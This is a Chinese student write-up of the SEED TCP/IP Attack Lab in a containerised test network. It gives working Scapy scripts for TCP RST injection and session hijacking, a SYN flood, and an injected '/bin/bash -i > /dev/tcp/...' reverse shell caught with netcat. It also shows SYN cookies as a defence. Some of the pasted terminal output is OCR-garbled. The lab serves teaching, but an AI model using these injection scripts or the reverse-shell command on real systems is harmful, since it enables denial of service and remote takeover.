TCP/IP Attack Lab

57118224 邱龙

Task 1: SYN Flooding Attack

(1) 对目标主机进行 SYN 泛洪攻击

攻击开始前 netstat -nat 命令查看被攻击主机 tcp 状态,可以发现目前只有两个 listen 状态。

```
root@bc2c6824b0fa:/# netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.11:39683 0.0.0.0:* LISTEN
```

编译并执行 synflood. c 程序,对被害者的 23 号端口进行 SYN 泛洪攻击:

```
gcc -o synflood synflood.c
synflood 10.9.0.5 23
```

在被攻击主机中再次执行 netstat -nat 命令查看 tcp 连接状态:

```
root@bc2c6824b0fa:/# netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address
                                             Foreign Address
                                                                     State
                                                                     LISTEN
tcp
           0
                  0 0.0.0.0:23
                                             0.0.0.0:*
tcp
                  0 127.0.0.11:39683
                                             0.0.0.0:*
                                                                     LISTEN
           0
                  0 10.9.0.5:23
                                             55.106.146.77:45213
                                                                     SYN RECV
tcp
           0
                  0 10.9.0.5:23
                                                                     SYN RECV
                                             47.221.117.74:761
tcp
           0
                 0 10.9.0.5:23
                                             7.7.206.1:34309
                                                                     SYN RECV
tcp
tcp
           0
                 0 10.9.0.5:23
                                             20.244.160.125:19516
                                                                     SYN RECV
                                                                     SYN RECV
           0
                 0 10.9.0.5:23
                                             142.225.194.119:46630
tcp
                 0 10.9.0.5:23
tcp
                                             17.89.31.36:61413
                                                                     SYN RECV
           0
                 0 10.9.0.5:23
                                             88.218.127.97:40593
                                                                     SYN RECV
tcp
           0
                 0 10.9.0.5:23
                                            115.91.6.83:57364
                                                                     SYN RECV
tcp
           0
                 0 10.9.0.5:23
                                             63.92.130.53:62860
                                                                     SYN RECV
tcp
           0
                 0 10.9.0.5:23
                                                                     SYN RECV
tcp
                                            125.90.43.33:37160
           0
                 0 10.9.0.5:23
                                            5.79.214.69:13891
                                                                     SYN RECV
tcp
                  0 10.9.0.5:23
                                             48.70.218.25:40196
                                                                     SYN RECV
tcp
                  A 1A Q A 5.23
                                             211 221 138 12A · 45271
                                                                     SYN RECV
```

发现有大量的 SYN-RECV 状态,说明被攻击主机已经被进行 SYN 泛洪攻击。在另一台主机中 Telnet 被攻击者主机,发现无法连接:

```
root@aeb81df15c88:/# telnet 10.9.0.5
Trying 10.9.0.5...
```

(2) 攻击前进行 Telnet 连接

如果我们停止攻击,再次在另一台主机中 Telnet 被攻击主机,发现 Telnet 连接成功。

```
root@aeb81df15c88:/# telnet 10.9.0.5
Trying 10.9.0.5...
Connected to 10.9.0.5.
Escape character is '^]'.
Ubuntu 20.04.1 LTS
```

如果 Telnet 连接成功一次后再次进行 SYN 泛洪攻击,然后再次 Telnet 被攻击主机,发现还是能连接成功。

root@aeb81df15c88:/# telnet 10.9.0.5
Trying 10.9.0.5...
Connected to 10.9.0.5.
Escape character is '^]'.

说明被攻击主机已经记住了过去成功的连接,当再次连接时,不会受到攻击的影响。我们可以在被攻击主机上执行 ip tcp_metrics show 命令查看保存的连接信息: root@bc2c6824b0fa:/# 1p tcp_metrics show 10.9.0.6 age 40.712sec cwnd 10 rtt 174us rttvar 164us source 10.9.0.5

10.9.0.6 age 40.712sec cwild 10 ftt 1740s fttvar 1040s source 10.9.0.5

ip tcp_metrics flush 命令清除保存的连接信息后,再次在攻击进行时进行 Telnet 连接时又连接失败了。

```
root@bc2c6824b0fa:/# ip tcp_metrics show
10.9.0.6 age 40.712sec cwnd 10 rtt 174us rttvar 164us source 10.9.0.5
root@bc2c6824b0fa:/# ip tcp_metrics flush
root@bc2c6824b0fa:/# ip tcp metrics show
```

```
root@aeb81df15c88:/# telnet 10.9.0.5
Trying 10.9.0.5...
```

这是因为以前成功的连接信息被清除了,所以该连接又会受到攻击的影响了。 但是经过多次实验,发现 ip tcp_metrics flush 命令有时候不能顺利清除信息,多 次尝试才能成功清除。

(3) 启动 SYN cookie 机制

在 docker-compose. yml 中修改为 net. ipv4. tcp_syncookies=1, 启用 SYN cookie 机制。需要注意的是这里需要重启容器。再次进行攻击和 Telnet 连接:

root@/542/3d534d2:/# netstat -nat

Active Internet connections (servers and established)

PLOTO	Recv-Q	Sena-Q	Local Address	Foreign Address	State
tcp	0	0	0.0.0.0:23	0.0.0.0:*	LISTEN
tcp	0	0	127.0.0.11:34587	0.0.0.0:*	LISTEN
tcp	0	0	10.9.0.5:23	110.122.85.44:19045	SYN_RECV
tcp	0	0	10.9.0.5:23	40.43.49.20:24429	SYN_RECV
tcp	0	0	10.9.0.5:23	153.66.153.81:32648	SYN_RECV
tcp	0	0	10.9.0.5:23	240.125.165.106:57687	SYN_RECV
tcp	0	0	10.9.0.5:23	169.202.147.100:4660	SYN_RECV
tcp	0	0	10.9.0.5:23	124.218.121.60:48751	SYN_RECV
	Α.	^	10 0 0 5.22	06 00 26 122.2277	CVN DECV

root@6054e4ac8530:/# telnet 10.9.0.5

Trying 10.9.0.5...

Connected to 10.9.0.5.

Escape character is '^l'.

Ubuntu 20.04.1 LTS

754273d534d2 login:

发现此时虽然被攻击主机仍然显示有许多 SYN-RECV 状态连接,但是其他主机依旧可以成功 Telnet 连接到被攻击主机。说明 SYN cookie 机制成功抵抗了泛洪攻击。

Task 2:TCP RST Attacks on telnet Connections

在用户主机 1 中对被攻击主机进行 Telnet 连接,用 wireshark 抓包,设过滤为: ip.src==10.9.0.5 or ip.dst==10.9.0.5 and telnet,观察最后一个 Telnet 报文。

```
Frame 570: 89 bytes on wire (712 bits), 89 bytes captured (712 bits) on interface any, id 0
Linux cooked capture
Internet Protocol Version 4, Src: 10.9.0.5, Dst: 10.9.0.6

Transmission Control Protocol, Src Port: 23, Dst Port: 35988, Seq: 1937136917, Ack: 1007651828, Len: 21
Source Port: 23
Destination Port: 35988
[Stream index: 4]
[TCP Segment Len: 21]
Sequence number: 1937136917
[Next sequence number: 1937136938]

Acknowledgment number: 1007651828
1000 ... = Header Length: 32 bytes (8)

Flags: 0x018 (PSH, ACK)
Window size value: 509
```

源 IP 地址为 10. 9. 0. 5,目的地址为 10. 9. 0. 6,源端口 23,目的端口 35988,因为我们需要把连接断开,所以标志位为 R,下一个 seq 值为 1937136938,ack 为 1007651828,构造攻击数据包,代码如下:

```
#!/usr/bin/env python3
from scapy.all import*
ip = IP(src="10.9.0.5", dst="10.9.0.6")
tcp = TCP(sport=23, dport=35988, flags="RA", seq=1937136938, ack=1007651828)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)
```

攻击方执行代码后可以发现 Telnet 连接被中断了。

```
seed@754273d534d2:~$ Connection closed by foreign host.
root@6054e4ac8530:/# ■
```

说明攻击成功。

Task 3: TCP Session Hijacking

与前面相同,在用户主机 1 中对被攻击主机进行 Telnet 连接,用 wireshark 抓包,设过滤为: ip.src==10.9.0.5 or ip.dst==10.9.0.5 and telnet,观察最后一个 Telnet 报文。

```
1963 2021-07-08 17:0... 10.9.0.5
                                                  10.9.0.6
                                                                         TEL NET
                                                                                       81 Telnet Data
  1966 2021-07-08 17:0... 10.9.0.5
                                                 10.9.0.6
                                                                         TELNET
                                                                                      89 Telnet Data
Transmission Control Protocol, Src Port: 23, Dst Port: 42582, Seq: 3533459283, Ack: 3666142099, Len: 21
  Source Port: 23
  Destination Port: 42582
  [Stream index: 6]
  [TCP Segment Len: 21]
  Sequence number: 3533459283
  [Next sequence number: 353345
  Acknowledgment number: 3666142099
1000 .... = Header Length: 32 bytes (8)
Flags: 0x018 (PSH, ACK)
Window size value: 509
  [Calculated window size: 65152]
   [Window size scaling factor: 128]
  Checksum: 0x1458 [unverified]
```

与前面不同的是,这里代码中源 IP 地址为 10.9.0.6,目的地址为 10.9.0.5,源端口 42582,目的端口 23,标志位 PA,这里的 seq 值为数据包中的 ack,即 3666142099,ack 为数据包中的 next seq,即 3666142099,(经过非常多次尝试,seq 值和 ack 值绝对不能搞错,否则就不能执行正确)构造攻击数据包,代码如下:

```
#!/usr/bin/env python3
from scapy.all import*
ip = IP(src="10.9.0.6", dst="10.9.0.5")
tcp = TCP(sport=42582, dport=23, flags="PA", seq=3666142099, ack=3533459304)
data = "touch a.txt\r"
pkt = ip/tcp/data
ls(pkt)
send(pkt,verbose=0)
```

代码中我们执行 touch a. txt 命令来,最后可以通过观察被攻击主机中是否生成了 a. txt 文件来判断命令是否正确执行,即判断 TCP 会话劫持是否成功。

PS:值得非常注意的是,经过非常非常非常多次尝试,发现执行的命令语句后面要加上换行符\r(例如这里我们令 data = "touch a. txt\r"),否则命令不会执行。

成功执行程序后输出:

```
root@VM:/volumes# Hijacking.py
                                                  = 4
version : BitField (4 bits)
                                                                    (4)
ihl
           : BitField (4 bits)
                                                  = None
                                                                    (None)
          : XByteField
                                                  = 0
tos
                                                                    (0)
           : ShortField
len
                                                 = None
                                                                    (None)
           : ShortField
id
                                                 = 1
                                                                    (1)
          : FlagsField (3 bits)
                                                 = <Flag 0 ()>
                                                                    (<Flag 0 ()>)
flags
frag
           : BitField (13 bits)
                                                 = 0
                                                                    (0)
           : ByteField
ttl
                                                 = 64
                                                                    (64)
proto
           : ByteEnumField
                                                  = 6
                                                                    (0)
chksum
           : XShortField
                                                  = None
                                                                    (None)
                                                 = '10.9.0.6'
           : SourceIPField
                                                                    (None)
src
                                                  = '10.9.0.5'
dst
           : DestIPField
                                                                    (None)
options
          : PacketListField
                                                  = []
                                                                    ([])
                                                  = 42582
                                                                    (20)
sport
          : ShortEnumField
dport
           : ShortEnumField
                                                  = 23
                                                                    (80)
                                                 = 707
                                                                    (0)
seq
           : IntField
                                                 = 116
                                                                    (0)
ack
          : IntField
dataofs
          : BitField (4 bits)
                                                 = None
                                                                    (None)
reserved
         : BitField (3 bits)
                                                 = 0
                                                                    (0)
           : FlagsField (9 bits)
                                                 = <Flag 24 (PA)>
                                                                    (<Flag 2 (S)>
flags
```

然后执行 cd 和 ls 命令查看被攻击主机根目录文件:

root@1e0ad923ca5b:~# ls

a.txt

发现成功生成 a. txt, 说明劫持成功。

Task 4: Creating Reverse Shell using TCP Session Hijacking

与 task3 基本相同,不同的是这里我们需要执行的命令是/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1。其他步骤与上面相同。抓取的数据包和运行代码如下:

```
#!/usr/bin/env python3
from scapy.all import*
ip = IP(src="10.9.0.6", dst="10.9.0.5")
tcp = TCP(sport=42802, dport=23, flags="PA", seq=847582096, ack=1012941684)
data = "/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1\r"
pkt = ip/tcp/data
ls(pkt)
send(pkt,verbose=0)
```

```
9066 2021-07-08 18:3...10.9.0.5 10.9.0.6 TELNET 89 Telnet Data ...

Frame 9066: 89 bytes on wire (712 bits), 89 bytes captured (712 bits) on interface any, id 0

Linux cooked capture

Internet Protocol Version 4, Src: 10.9.0.5, Dst: 10.9.0.6

Transmission Control Protocol, Src Port: 23, Dst Port: 42802, Seq: 1012941663, Ack: 847582096, Len: 21

Source Port: 23

Destination Port: 42802

[Stream index: 116]

[TCP Segment Len: 21]

Sequence number: 1012941663

[Next sequence number: 1012941684]

Acknowledgment number: 847582096

1000 ... = Header Length: 32 bytes (8)

Flags: 0x018 (PSH, ACK)

Window size value: 509
```

由于我们需要攻击方一边监听端口,一边发送反弹 shell 的程序,所以这里我们 开启两个攻击方的终端。

其中一个终端先执行 nc -lnv 9090 语句监听端口, 然后再另一个终端执行我们的攻击程序。

监听成功后两个终端结果如下:

```
root@VM:/Volumes# nc -lnv 9090
Listening on 0.0.0.0 9090
Connection received on 10.9.0.5 34918
root@9c1f418788a2:~# ■
```

```
(0)
(64)
trad
           : Bithield
                        (I3 bits)
                                                    = 0
           : ByteField
                                                    = 64
ttl
proto
           : ByteEnumField
                                                    = 6
                                                                       (0)
           : XShortField
                                                   = None
                                                                       (None)
chksum
                                                   = '10.9.0.6'
src
           : SourceIPField
                                                                       (None)
                                                   = '10.9.0.5'
dst
           : DestIPField
                                                                       (None)
options
                                                   = []
           : PacketListField
                                                                       ([])
sport
           : ShortEnumField
                                                   = 42802
                                                                       (20)
                                                                       (80)
           : ShortEnumField
                                                   = 23
dport
                                                   = 847582096
seq
           : IntField
                                                                       (0)
           : IntField
                                                   = 1012941684
                                                                       (0)
ack
          : BitField
: BitField
dataofs
                        (4 bits)
                                                   = None
                                                                       (None)
                                                   = 0
reserved
                        (3 bits)
                                                                       (0)
           : FlagsField (9 bits)
                                                   = <Flag 24 (PA)>
                                                                       (<Flag 2 (S)>
flags
                                                   = 8192
                                                                       (8192)
window
           : ShortField
          : XShortField
                                                                       (None)
chksum
                                                   = None
                                                                       (0)
(b'')
urgptr
           : ShortField
                                                   = 0
options
           : TCPOptionsField
                                                    = []
           : StrField
                                                   = b'/bin/bash -i > /dev/tcp/10.
9.0.1/9090 0<&1 2>&1\r' (b'')
root@VM:/volumes#
```

然后我们就可以在攻击方主机上执行 shell 控制被攻击主机了。例如查看当前路径:

root@9c1f418788a2:~# pwd

pwd

/root

root@9c1f418788a2:~#

以及查看被攻击主机网路信息。

root@9c1f418788a2:~# ifconfig

ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 10.9.0.5 netmask 255.255.255.0 broadcast 10.9.0.255

ether 02:42:0a:09:00:05 txqueuelen 0 (Ethernet)

RX packets 451 bytes 36612 (36.6 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 420 bytes 32776 (32.7 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

说明反 shell 创建成功。

有时候/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1 语句似乎会偶尔没能执行成功,也可能是没能监听到,尝试几次即可。